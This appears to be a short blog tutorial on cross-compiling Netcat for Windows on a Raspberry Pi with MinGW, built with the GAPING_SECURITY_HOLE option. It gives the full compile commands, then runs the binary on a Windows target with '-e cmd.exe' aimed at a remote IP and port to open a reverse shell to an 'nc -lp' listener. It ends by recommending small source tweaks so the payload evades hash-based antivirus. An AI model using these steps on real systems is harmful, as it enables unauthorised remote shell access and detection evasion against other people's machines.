It has been a crazy few weeks. Thus this post is going to be brief. If you have any questions feel free to hit me up on Twitter. Also you may find this post detailing how to compile Net Cat on Windows 10 to run on Windows 10 informative.
The environment I used to build this doc is as follows:
Raspberry Pi 3 running Raspbian GNU/Linux (version 9 stretch)
You will need to install MinGW (version 5.0.1-1 as of 10/17)
NetCat (to listen for the reverse shell): sudo apt-get install netcat
This can easily be done as: sudo apt-get install mingw-w64
The Net Cat C source code which can be obtained here.
I tested this on a Windows 10 box with the most current updates as of (10/17/2017). Since this box is the target nothing really fancy here. Just a standard Windows 10 box.
Open Terminal and navigate / SSH to the folder holding the source code.
pi@blah:$ i686-w64-mingw32-gcc -c -O3 -march=i686 -DWIN32 -DNDEBUG -D_CONSOLE -DTELNET -DGAPING_SECURITY_HOLE getopt.c
pi@blah:$ i686-w64-mingw32-gcc -c -O3 -march=i686 -DWIN32 -DNDEBUG -D_CONSOLE -DTELNET -DGAPING_SECURITY_HOLE doexec.c
pi@blah:$ i686-w64-mingw32-gcc -c -O3 -march=i686 -DWIN32 -DNDEBUG -D_CONSOLE -DTELNET -DGAPING_SECURITY_HOLE netcat.c
pi@blah:$ sudo i686-w64-mingw32-gcc getopt.o netcat.o doexec.o -o iRunOnWindows.exe -O3 -march=i686 -Wl,-lkernel32,-luser32,-lwinmm,-lws2_32
pi@blah:$ sudo /usr/i686-w64-mingw32/bin/strip iRunOnWindows.exe
The last two sudos are probably not needed if you are using a fresh Raspbian; I am running some other tests / doing other things-n-stuff and thus permission’s wise it was needed. I am merely sharing exactly how I got this running. Feel free to experiment. Anyhow.
Transfer the iRunOnWindows.exe file to your windows box.
Open CMD, Run: c:\..path to exe…\iRunOnWindows.exe -e cmd.exe
example: c:\Users\user\Downloads\iRunOnWindows.exe 220.127.116.11 2222 -e cmd.exe
On your control box run nc -lp
example: nc -lp 2222
This basic outline demonstrates how it is possible to develop and build binary executables on Linux designed for Windows. This has many convenient uses. First, compiling a payload yourself gives you a lot of control. Your target Windows box may not have compilers available but detail should not really matter. Furthermore, by making small tweaks to the source code you likely can bypass (at least initially) security software that relies on file hashes to flag stuff as malicious. By compiling your own borrowed code you limit the chances a common program (like NC) will be immediately detected.